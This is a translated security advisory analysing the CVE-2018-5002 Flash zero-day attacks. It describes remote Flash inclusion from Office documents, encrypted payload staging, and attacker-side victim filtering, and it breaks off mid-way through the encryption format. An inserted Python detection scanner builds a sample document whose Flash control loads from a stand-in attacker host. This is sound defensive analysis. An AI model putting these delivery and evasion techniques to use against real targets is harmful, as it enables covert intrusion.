Flash zero-day vulnerability CVE-2018-5002 exploited in targeted network attacks in the Middle East: vulnerability warning (myhack58.com)

Source: www.myhack58.com, ID MYHACK58:62201890504
Author: 佚名 (anonymous)
Published: 2018-06-21 00:00:00 (Jun 21, 2018, 12:00 a.m.)
Views: 306

CVSS3: 9.8 High (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Privileges Required: NONE
  User Interaction: NONE
  Scope: UNCHANGED
  Confidentiality Impact: HIGH
  Integrity Impact: HIGH
  Availability Impact: HIGH

CVSS2: 10 High (AV:N/AC:L/Au:N/C:C/I:C/A:C)
  Access Vector: NETWORK
  Access Complexity: LOW
  Authentication: NONE
  Confidentiality Impact: COMPLETE
  Integrity Impact: COMPLETE
  Availability Impact: COMPLETE

EPSS: 0.028 Low (Percentile 89.5%)

![](/Article/UploadPic/2018-6/2018621151215316.jpg?www.myhack58.com)
Recently, the ICEBRG Security Research Team (SRT) identified targeted network attacks exploiting an Adobe Flash zero-day vulnerability, CVE-2018-5002. The attacker used the zero-day to penetrate the networks of important individuals and organizations in the Middle East. By exploiting the vulnerability with a crafted malicious Flash object, the attacker can execute code on the targeted victim's computer and then run a chain of follow-on payloads and malicious code.
This article discloses the details of the attack, including a technical analysis, the targeting of Qatar, and some recommended defensive measures. We hope that publishing these findings will help the industry and individuals stay alert to similar attacks exploiting this vulnerability and defend against them in time. We first reported the vulnerability to Adobe on June 1, 2018 at 4:14 AM PDT; Adobe and the ICEBRG security team coordinated to confirm and reproduce the vulnerability as quickly as possible, and Adobe released a patch for it on June 7, 2018.
Attack review
We found that in these CVE-2018-5002 attacks, the exploit code that runs on the victim's computer is downloaded and executed through Microsoft Office. The overall exploitation process is shown in the figure below. First, when the targeted victim opens a Microsoft Office document in which the attacker has embedded a malicious object, the document downloads and executes a remote Shockwave Flash (SWF) file. Unlike most Flash exploits delivered through Microsoft Office, which embed the Flash content in the document, this document uses a little-known feature to load all of its SWF content from the attacker's server.
The first-stage SWF in the delivery chain implements an RSA+AES encryption scheme that protects the download and distribution of the subsequent SWF carrying the actual exploit code. Asymmetric encryption such as RSA can evade some traditional replay-based security devices and prevents after-the-fact analysis of captured network traffic. In the second stage of SWF distribution, triggered when the victim opens the Microsoft Office document, the same encryption scheme is used to download from the attacker's server shellcode containing backdoor functionality and subsequent tooling, ultimately gaining control of the target system. The final payload typically contains a series of threatening core shellcode; we attempted to recover and extract the final payload but, for reasons outside our control, did not succeed.
![](/Article/UploadPic/2018-6/2018621151216649.png?www.myhack58.com)
Remote Flash inclusion
Since many browsers disable Flash, loading Adobe Flash Player from inside a Microsoft Office document and playing the content there is a very popular attack method. But this attack also differs from the norm. Generally, the attacker either embeds the entire exploit Flash file in the document or embeds a Flash loader that selectively downloads an exploit or payload (for example APT28/Sofacy's DealersChoice), which leaves a Flash loader file that defenders can flag or trace back.
Unlike these typical attacks, this attack does not embed Flash directly but uses a less well-known feature to include the Flash content remotely. As shown below, the combined effect is that the document contains the Flash Player ActiveX control's XML wrapper and a reference to an OLE object:
![](/Article/UploadPic/2018-6/2018621151216229.png?www.myhack58.com)
In the Flash object shown in the figure, a "Movie" property defines the address of a remote Flash object; this is a plain initial use of remote object inclusion. Remotely loading the embedded Flash object has several significant advantages:
Evasion and anti-analysis: first, the Microsoft Office document itself contains no malicious code. For static detection, the best approach is to analyze the remotely included Flash content. For dynamic detection, the defender's sandbox or emulator must interact with the attacker's server to receive the malicious content, which requires the analysis system to have a live Internet connection. Moreover, the attacker can selectively serve the next stage of the intrusion based on the requesting IP address or HTTP headers. Once access to the target system is established, the attacker can disable the C2 server, after which analysis of the attack can rely only on residual behavioral evidence.
Precise targeting: because the attacker can selectively serve exploit code to victim systems, they can restrict the attack to the intended victims' systems. For example, the attacker can whitelist the regional ISPs of the target company or individual and blacklist cloud infrastructure and security companies, restricting access to specific IP addresses. The HTTP headers "Accept-Language" and "User-Agent" can also be used to whitelist the known victims' locale and system environment, or to blacklist security products that respond abnormally or incorrectly. The ordering, presence or absence of HTTP headers can usually also distinguish security products from real victims and intended targets. Finally, the "x-flash-version" header reveals the victim system's Flash Player version, so the server side can choose the most effective exploit code for that version.
Even though the attacker's static footprint is small in this way, the remote Flash object is fetched and executed from within the Microsoft Office document while the document is being loaded.
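The static check suggested above (look for the remote inclusion itself rather than for embedded Flash bytes) can be scripted against the document container. The following is an added example, not code from the article or from ICEBRG: it unzips an OOXML (.docx) file, walks every XML part, and reports ActiveX controls whose "Movie" property holds an http/https/ftp URL. The CLSID is the real Shockwave Flash Object CLSID; the element and attribute names (`ax:ocx`, `ax:ocxPr`, `ax:name`, `ax:value`) follow Word's persisted ActiveX part format as I know it, and the sample document built inline, including the placeholder host, is constructed for the demonstration.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Real CLSID of the "Shockwave Flash Object" ActiveX control.
FLASH_CLSID = "{D27CDB6E-AE6D-11CF-96B8-444553540000}"
# Namespace Word uses for persisted ActiveX control properties (word/activeX/activeX*.xml).
AX_NS = "http://schemas.microsoft.com/office/2006/activeX"
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def _local(qname):
    """Strip the {namespace} prefix from an ElementTree tag or attribute name."""
    return qname.rsplit("}", 1)[-1]


def find_remote_flash_includes(docx_bytes):
    """Scan every XML part of an OOXML file for ActiveX controls whose
    'Movie' property points at a remote URL. Returns a list of findings."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for part in zf.namelist():
            if not part.lower().endswith(".xml"):
                continue
            try:
                root = ET.fromstring(zf.read(part))
            except ET.ParseError:
                continue  # not well-formed XML, so not an ActiveX part
            for ocx in root.iter():
                if _local(ocx.tag) != "ocx":
                    continue
                ocx_attrs = {_local(k): v for k, v in ocx.attrib.items()}
                classid = ocx_attrs.get("classid", "").upper()
                for prop in ocx:
                    if _local(prop.tag) != "ocxPr":
                        continue
                    p = {_local(k): v for k, v in prop.attrib.items()}
                    value = p.get("value", "")
                    if p.get("name", "").lower() == "movie" and REMOTE_URL.match(value):
                        findings.append({
                            "part": part,
                            "classid": classid,
                            "movie": value,
                            "is_flash_control": classid == FLASH_CLSID,
                        })
    return findings


def build_sample_docx(movie_value):
    """Constructed minimal .docx (only the parts the scanner needs) whose
    embedded Flash control carries the given Movie property. This is a
    constructed sample for the demonstration, not a real malicious document."""
    activex_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<ax:ocx xmlns:ax="{AX_NS}" ax:classid="{FLASH_CLSID}" ax:persistence="persistPropertyBag">'
        f'<ax:ocxPr ax:name="Movie" ax:value="{movie_value}"/>'
        '<ax:ocxPr ax:name="Play" ax:value="-1"/>'
        '</ax:ocx>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml",
                    '<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr("word/activeX/activeX1.xml", activex_xml)
    return buf.getvalue()


if __name__ == "__main__":
    # Placeholder host: the article does not give the attacker's real infrastructure.
    suspicious = build_sample_docx("http://attacker-host.example/stage1.swf")
    for f in find_remote_flash_includes(suspicious):
        print(f"[!] {f['part']}: Movie -> {f['movie']} (Flash control: {f['is_flash_control']})")
    benign = build_sample_docx("intro.swf")  # relative path, not a remote include
    print("benign findings:", find_remote_flash_includes(benign))
```

Matching on the local element names rather than the namespace prefix keeps the scanner working when a document declares a different prefix, and reporting whether the CLSID is the Flash control lets the triage rule distinguish a Flash remote include from some other control with a "Movie"-named property. The URL itself is what analysts then need to fetch for analysis, ideally with the same headers the victim's Office/Flash client would send, since the article notes the server filters on them.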
The encryption mechanism
Once the attack succeeds, data communication from the server to the client is obfuscated by a custom encryption mechanism based on the AES symmetric algorithm, shown in the figure below. AES and RSA are used in combination so that both the payload data and the symmetric key are protected by encryption. The custom mechanism relies on a common ActionScript library to perform the low-level operations.
![](/Article/UploadPic/2018-6/2018621151216302.png?www.myhack58.com)
The client first initiates the data communication request to the server. In this step the client sends, via HTTP POST, a randomly generated RSA modulus n and the public exponent e=0x10001, i.e. the public key (n, e). The server then responds with data in the following encrypted format:
0x0: Encrypted AES key length (L)
